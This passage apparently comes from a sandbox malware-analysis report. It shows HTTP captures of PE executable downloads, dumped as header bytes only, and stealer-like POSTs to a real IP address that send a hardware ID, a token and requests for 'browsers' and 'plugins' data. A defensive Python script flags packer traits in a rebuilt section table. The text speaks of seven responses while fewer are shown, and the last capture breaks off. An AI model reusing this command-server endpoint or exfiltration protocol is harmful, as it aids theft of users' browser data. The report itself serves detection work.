65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 04 Jul 2024 20:20:33 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:20:37 GMTContent-Type: application/octet-streamContent-Length: 1906688Last-Modified: Thu, 04 Jul 2024 20:03:38 GMTConnection: keep-aliveETag: "6687001a-1d1800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 a0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4b 00 00 04 00 00 d3 a3 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 8d 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 8c 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6f 73 75 75 66 71 65 00 00 1a 00 00 90 31 00 00 00 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 78 6e 6c 74 65 74 77 00 10 00 00 00 90 4b 00 00 04 00 00 00 f2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4b 00 00 22 00 00 00 f6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:21:04 GMTContent-Type: application/octet-streamContent-Length: 2533376Last-Modified: Thu, 04 Jul 2024 19:57:26 GMTConnection: keep-aliveETag: "6686fea6-26a800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c8 e6 86 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 fc 0d bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 e0 9c 00 65 0e 00 00 88 ee 9c 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 9c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 f0 78 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 80 22 00 00 b0 9c 00 00 74 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 04 Jul 2024 20:21:09 GMTContent-Type: application/octet-streamContent-Length: 1166336Last-Modified: Thu, 04 Jul 2024 20:03:03 GMTConnection: keep-aliveETag: "6686fff7-11cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f0 ff 86 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1c 08 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 12 00 00 04 00 00 45 b2 12 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 7c 61 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 11 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c 61 04 00 00 40 0d 00 00 62 04 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 11 00 00 76 00 00 00 56 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
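The seven responses above are complete PE downloads (MZ/PE headers in the first bytes, served as application/x-msdos-program or application/octet-stream). The dump for the 1906688-byte file from the nginx host is worth reading by hand: its section table has two names made only of spaces, an ".idata" name padded with spaces, a section whose VirtualSize (0x2ae000) is over 5000 times its 0x200 bytes on disk, and five sections mapped read-write-execute, which is what the "PE file has nameless sections" and "section with special chars" signatures in this report key on and what a runtime unpacker needs. The script below is an added example written for this page, not tooling from the sandbox or from the sample. It rebuilds only the header region of that download from values transcribed from the dump (DOS stub and most of the optional header zeroed, which is an assumption the parser does not depend on), walks the section table the way one would walk the file itself, and reports the traits above. As a consistency check, the highest file offset claimed by any section comes out to 0x1d1800 = 1906688, the Content-Length the server sent and the size half of the nginx ETag "6687001a-1d1800".

```python
import struct

# Section table of the 1906688-byte executable served by the nginx host in the
# captures above, transcribed field by field from the dumped header bytes:
# (Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics).
CAPTURED_SECTIONS = [
    (b"   \x00    ",       0x068000, 0x001000, 0x02DC00, 0x001000, 0xE0000040),
    (b".rsrc\x00\x00\x00", 0x0001E0, 0x069000, 0x000200, 0x02EC00, 0xC0000040),
    (b".idata  ",          0x001000, 0x06A000, 0x000200, 0x02EE00, 0xC0000040),
    (b"        ",          0x2AE000, 0x06B000, 0x000200, 0x02F000, 0xE0000040),
    (b"aosuufqe",          0x1A0000, 0x319000, 0x1A0000, 0x02F200, 0xE0000040),
    (b"lxnltetw",          0x001000, 0x4B9000, 0x000400, 0x1CF200, 0xE0000040),
    (b".taggant",          0x003000, 0x4BA000, 0x002200, 0x1CF600, 0xE0000040),
]

IMAGE_SCN_MEM_RWX = 0xE0000000            # EXECUTE | READ | WRITE
NAME_CHARS = frozenset(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")
SECTION_HEADER = "<8sIIIIIIHHI"           # IMAGE_SECTION_HEADER, 40 bytes
COFF_HEADER = "<HHIIIHH"                  # IMAGE_FILE_HEADER, 20 bytes


def build_pe_header(sections=CAPTURED_SECTIONS) -> bytes:
    """Rebuild the header region of the download (DOS stub and most of the
    optional header zeroed, an assumption) so parse_sections() walks it the
    same way it would walk the file. Machine, timestamp, e_lfanew and
    SizeOfImage are the captured values."""
    dos = bytearray(0x100)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x100)                    # e_lfanew
    coff = struct.pack(COFF_HEADER, 0x014C, len(sections), 0x6661EA84, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 56, 0x4BD000)                   # SizeOfImage
    table = b"".join(struct.pack(SECTION_HEADER, n, vs, va, rs, rp, 0, 0, 0, 0, fl)
                     for n, vs, va, rs, rp, fl in sections)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


def parse_sections(pe: bytes) -> list:
    """Locate the section table through e_lfanew and decode every entry."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not at e_lfanew")
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, pe, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsec):
        entry = pe[table + 40 * i: table + 40 * (i + 1)]
        if len(entry) < 40:
            raise ValueError("section table truncated")
        name, vsize, va, rsize, rptr, _, _, _, _, flags = struct.unpack(SECTION_HEADER, entry)
        sections.append({"index": i, "name": name, "virt_size": vsize, "virt_addr": va,
                         "raw_size": rsize, "raw_ptr": rptr, "flags": flags})
    return sections


def section_findings(sections, packed_ratio=16) -> list:
    """Flag nameless sections, special characters in names, RWX mappings and
    sections whose virtual size dwarfs what is on disk (room for an unpacker)."""
    findings = []
    for s in sections:
        visible = s["name"].split(b"\x00", 1)[0]       # name is NUL-terminated
        if not visible.strip(b" "):
            findings.append((s["index"], "nameless section"))
        elif any(c not in NAME_CHARS for c in visible):
            findings.append((s["index"], "special characters in section name"))
        if (s["flags"] & IMAGE_SCN_MEM_RWX) == IMAGE_SCN_MEM_RWX:
            findings.append((s["index"], "section mapped RWX"))
        if s["virt_size"] >= 0x1000 and s["virt_size"] >= packed_ratio * max(s["raw_size"], 1):
            findings.append((s["index"], "virtual size far exceeds raw size"))
    return findings


def raw_extent(sections) -> int:
    """Highest file offset any section claims; for an untruncated download this
    equals the Content-Length the server sent (1906688 here)."""
    return max(s["raw_ptr"] + s["raw_size"] for s in sections)


if __name__ == "__main__":
    secs = parse_sections(build_pe_header())
    for s in secs:
        print(f"{s['index']} {s['name']!r:18} vsize={s['virt_size']:#9x} "
              f"raw={s['raw_size']:#9x} flags={s['flags']:#010x}")
    for idx, why in section_findings(secs):
        print(f"  section {idx}: {why}")
    print("raw extent:", raw_extent(secs))
```

The same parse_sections() and section_findings() run unchanged on the dropped file itself; the rebuilt header only stands in for it here so the example runs offline.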
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 85.28.47.30Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 45 46 36 41 36 32 38 32 45 35 38 34 35 37 37 30 33 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4e 69 63 65 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="hwid"18EF6A6282E5845770397------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="build"Nice------HCAAEGIJKEGHIDGCBAEB--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"browsers------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBAFIIECBFHIEBKJJKHost: 85.28.47.30Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 42 41 46 49 49 45 43 42 46 48 49 45 42 4b 4a 4a 4b 2d 2d 0d 0a Data Ascii: ------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="token"cbc74074a82f5e8261ba40bbb4c65ce6ff514a65880e6904e72817bc2f3d26e95c676a02------GHDBAFIIECBFHIEBKJJKContent-Disposition: form-data; name="message"plugins------GHDBAFIIECBFHIEBKJJK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBKHost: 85.28.47.30Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 62 63 37 34 30 37 34 61 38 32 66 35 65 38 32 36 31 62 61 34 30 62 62 62 34 63 36 35 63 65 36 66 66 35 31 34 61 36 35 38 38 30 65 36 39 30 34 65 37 32 38 31 37 62 63 32 66 33 64 32 36 65 39 35 63 36 37 36 61 30 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 45 47 44 42 46 49 49 44 47 43 41 4b 4a 45 42 4b 2d 2d 0d 0a Data Ascii: 